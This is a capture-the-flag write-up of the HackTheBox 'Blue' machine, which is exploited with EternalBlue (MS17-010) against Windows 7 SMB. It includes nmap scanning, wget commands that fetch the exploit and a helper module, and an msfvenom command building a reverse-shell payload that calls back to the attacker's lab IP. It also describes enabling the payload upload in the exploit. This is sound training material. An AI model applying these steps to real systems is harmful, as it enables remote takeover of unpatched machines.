Introduction

This is the second machine that I am solving today as part of the HackTheBox series. Blue usually resonates with eternal blue and this machine being a windows machine, high stakes are on this being vulnerable to Eternal Blue.

Scanning & Enumeration

nmap -sV -sC -A -p135,139,445,49152,49153,49154,49155,49156,49157 -oA nmap/initial -Pn 10.10.10.40

From the results above, we see that only Samba is being run on the target machine with the software version being:
`Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP).`

Samba Enumeration

Google Search with Samba Version

We see both our favorites here, and since this is OSCP based, let’s go ahead with exploit-db.

Vulnerability Analysis

Eternal Blue exploit on Exploit Database

As we see that this is remotely exploitable.

Exploitation

Let’s get started, first let’s download the exploit to our local machine.
As far as I remember, I have encountered a similar machine before on TryHackMe, here’s the link if anyone’s interested.

Let’s download the exploit

wget https://www.exploit-db.com/download/42315

Let’s look at the source code.

Exploit Source Code

An import for ‘mysmb’ is required, which we can download using the link in the exploit.

Next, we see that our windows machine name pops up on the list.

And finally, we see that we have an option to add a username and password to the script.

Let’s go ahead and download this dependency first.

wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py

Next, let us generate our payload.

msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.17 LPORT=4444 > eternal-blue.exe

Looking at the code further ahead, We see that finding the pipe name is not really necessary.

Finally, while reading the ‘ smb_pwn ’function we come across the snippet, where we have access to the system, but the code that sends our payload and executes it on the target machine has been commented out. Let’s remove that and send our regards ;)

Let’s start our netcat and then wait :D

We ran into errors saying that

Error not found accessible named pipe

Looking back at the source code, I realized that the username was left blank, so I added ‘guest’ as a username and then ran the script again.

It failed again !

Python Error

This suggested that maybe the source code was using python2 instead of python3. Even though python2 has reached its end of life and there will be no support, we still encounter a lot of code out there that still uses python2.

I ran the script again, and it failed again!

Failed Again

But this time I was sure that there was no other change to be made so I ran the script again, and voila! Oops, the magic word is BOOOOOOOM. I have a shell with admin privileges.

Shell with root privileges

Privesc

We don’t need to privesc in this scenario since we directly get admin access.

Summary | TL;DR

1. Scan ports using nmap
2. Find vulnerable Samba service
3. Exploit Eternal Blue.

Parting Thoughts

In this machine, we learned the following:

1. Sometimes the script won’t work in the first go, even if you did everything correctly, and I guess it’s fine, maybe part of the whole Try Harder mantra that we see out there.

Thank you for reading, please provide your feedback and share with people who are in need. :)